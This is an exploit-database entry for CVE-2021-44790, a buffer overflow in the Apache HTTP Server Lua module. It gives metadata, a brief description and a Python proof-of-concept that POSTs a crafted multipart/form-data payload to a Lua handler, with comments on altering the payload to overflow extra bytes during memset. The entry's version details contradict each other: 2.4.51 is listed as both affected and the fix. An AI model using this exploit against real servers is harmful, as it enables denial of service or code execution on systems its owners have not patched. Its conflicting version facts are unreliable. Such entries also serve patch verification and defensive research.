header-logo
Suggest Exploit
vendor:
Apache HTTP Server
by:
Sunil Iyengar
9.8
CVSS
CRITICAL
Buffer Overflow
119
CWE
Product Name: Apache HTTP Server
Affected Version From: Any version less than 2.4.51
Affected Version To: 2.4.51
Patch Exists: YES
Related CWE: CVE-2021-44790
CPE: a:apache:http_server:2.4.50
Metasploit: https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2021-44790/https://www.rapid7.com/db/vulnerabilities/suse-cve-2021-44790/https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-2-cve-2021-44790/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp5-cve-2021-44790/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp9-cve-2021-44790/https://www.rapid7.com/db/vulnerabilities/apache-httpd-cve-2021-44790/https://www.rapid7.com/db/vulnerabilities/debian-cve-2021-44790/https://www.rapid7.com/db/vulnerabilities/alma_linux-cve-2021-44790/https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2021-44790/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2021-44790/https://www.rapid7.com/db/vulnerabilities/ibm-http_server-cve-2021-44790/https://www.rapid7.com/db/vulnerabilities/oracle_linux-cve-2021-44790/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2021-44790/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp10-cve-2021-44790/https://www.rapid7.com/db/vulnerabilities/amazon_linux-cve-2021-44790/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2021-44790/https://www.rapid7.com/db/vulnerabilities/apple-osx-apache-cve-2021-44790/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2021-44790/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp3-cve-2021-44790/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp8-cve-2021-44790/
Other Scripts:
Platforms Tested: Kali, MacOS Monterey
2023

Apache 2.4.x – Buffer Overflow

A buffer overflow vulnerability exists in Apache 2.4.x versions less than 2.4.51. An attacker can send a specially crafted HTTP request with a malicious payload to the vulnerable server, which can lead to a denial of service or arbitrary code execution. The payload is sent as a multipart/form-data with a boundary value of 4, which can be changed to any other value. The form data returns a response of 'memory allocation error: block too big', but if the payload is changed to name="name"4, the lua module overflows 3 more bytes during memset.

Mitigation:

Upgrade to Apache 2.4.51 or later versions, or apply the patch provided by the vendor.
Source

Exploit-DB raw data:

# Exploit Title: Apache 2.4.x - Buffer Overflow
# Date: Jan 2 2023
# Exploit Author: Sunil Iyengar
# Vendor Homepage: https://httpd.apache.org/
# Software Link: https://archive.apache.org/dist/httpd/
# Version: Any version less than 2.4.51. Tested on 2.4.50 and 2.4.51
# Tested on: (Server) Kali, (Client) MacOS Monterey
# CVE : CVE-2021-44790


import requests

#Example "http(s)://<hostname>/process.lua"
url = "http(s)://<hostname>/<luafile>"

payload = "4\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\n0\r\n4\r\n"
headers = {
  'Content-Type': 'multipart/form-data; boundary=4'
}

#Note1: The value for boundary=4, in the above example, is arbitrary. It can be anything else like 1.
# But this has to match with the values in Payload.

#Note2: The form data as shown above returns the response as "memory allocation error: block too big".
# But one can change the payload to name=\"name\"\r\n\r\n\r\n4\r\n" and not get the error but on the lua module overflows
# 3 more bytes during memset

response = requests.request("POST", url, headers=headers, data=payload)

print(response.text)

#Response returned is
#<h3>Error!</h3>
#<pre>memory allocation error: block too big</pre>